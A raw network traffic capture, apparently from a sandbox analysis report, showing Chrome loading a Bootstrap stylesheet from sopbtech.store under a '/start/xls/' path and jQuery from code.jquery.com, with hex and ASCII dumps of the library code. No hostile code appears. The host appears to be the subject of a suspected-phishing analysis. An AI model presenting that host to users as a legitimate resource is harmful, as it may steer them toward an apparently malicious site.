2024-08-21 21:17:01 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2024-08-21 21:17:01 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2024-08-21 21:17:01 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2024-08-21 21:17:01 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	199.188.200.183	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:02 UTC	519	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sopbtech.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:02 UTC	352	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Wed, 28 Aug 2024 21:17:02 GMT content-type: text/css last-modified: Thu, 02 Sep 2021 13:45:52 GMT accept-ranges: bytes content-length: 258912 date: Wed, 21 Aug 2024 21:17:02 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-21 21:17:02 UTC	16032	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2024-08-21 21:17:02 UTC	16384	IN	Data Raw: 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 36 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 37 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 Data Ascii: .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6; order: 6 } .order-7 { -webkit
2024-08-21 21:17:02 UTC	16384	IN	Data Raw: 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 31 0d 0a 20 20 20 20 Data Ascii: rder-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12; -ms-flex-order: 11; order: 11
2024-08-21 21:17:02 UTC	15252	IN	Data Raw: 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e 64 3e 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d Data Ascii: -sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .input-group-sm>.input-group-append>.btn, .input-group-sm
2024-08-21 21:17:02 UTC	1079	IN	Data Raw: 77 3e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 32 63 63 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 63 62 66 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d Data Ascii: w>.btn-primary.dropdown-toggle { color: #fff; background-color: #0062cc; border-color: #005cbf } .btn-primary:not(:disabled):not(.disabled).active:focus, .btn-primary:not(:disabled):not(.disabled):active:focus,
2024-08-21 21:17:02 UTC	16384	IN	Data Raw: 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 20 20 Data Ascii: background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2024-08-21 21:17:02 UTC	16384	IN	Data Raw: 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 Data Ascii: how { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; overflow
2024-08-21 21:17:03 UTC	16384	IN	Data Raw: 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 75 73 74 6f Data Ascii: .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") } .custo
2024-08-21 21:17:03 UTC	16320	IN	Data Raw: 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a Data Ascii: -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferred-siz
2024-08-21 21:17:03 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 72 65 6d 20 31 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c Data Ascii: padding: 2rem 1rem; margin-bottom: 2rem; background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	151.101.2.137	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:02 UTC	358	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:02 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Wed, 21 Aug 2024 21:17:02 GMT Age: 397528 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740074-EWR X-Cache: HIT, HIT X-Cache-Hits: 2578, 1 X-Timer: S1724275022.406140,VS0,VE11 Vary: Accept-Encoding
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
